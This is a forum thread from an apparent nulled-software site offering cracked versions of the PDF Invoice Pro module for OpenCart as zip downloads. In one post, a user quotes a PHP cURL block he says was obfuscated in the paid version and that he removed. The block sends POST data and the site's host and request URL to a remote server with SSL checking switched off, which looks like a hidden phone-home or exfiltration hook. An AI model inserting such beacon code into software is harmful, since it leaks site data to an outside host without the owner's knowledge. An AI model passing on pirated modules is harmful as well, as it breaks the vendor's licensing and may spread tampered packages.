PDF Invoice Pro version 3.0.9 - for Opencart 3.x

vyper

Active member
Elite
XNullUser
Joined
Aug 13, 2024
Messages
28
Reaction score
166
Points
28
Location
internet
NullCash
1,412

Attachments

  • pdfinvoiceprov3.0.9.ocmod.zip
    3.3 MB · Views: 10
  • pdf_invoice_pro_v3.4.2.zip
    3.7 MB · Views: 6
Last edited by a moderator:

liwya2021

Member
XNullUser
Joined
Aug 21, 2021
Messages
151
Reaction score
17
Points
18
NullCash
6
Who has PDF Invoice Pro for OpenCart v3.4.2? Thank you
 

designerboyalee

Well-known member
Diamond
Elite
XNullUser
Joined
Apr 22, 2021
Messages
157
Reaction score
409
Points
63
NullCash
6
Thank you very much to the author for the module.
 

vyper

Active member
Elite
XNullUser
Joined
Aug 13, 2024
Messages
28
Reaction score
166
Points
28
Location
internet
NullCash
1,412
PDF Invoice Pro v3.42 Nulled for Opencart 2x, 3x
Because this version has some obuscatd code... I have compared with 3.0.9 and I have removed that code


$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://wen/apis.php"); // INSECURE: remote host
curl_setopt($ch, CURLOPT_REFERER, "http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/...");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post));
// WARNING: SSL verify disabled in orig; if using HTTPS, do NOT disable in production.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
 

Attachments

  • pdf_invoice_pro_v3.4.2.zip
    3.7 MB · Views: 9

liwya2021

Member
XNullUser
Joined
Aug 21, 2021
Messages
151
Reaction score
17
Points
18
NullCash
6
Thank you very much to the author for the module.
 
Top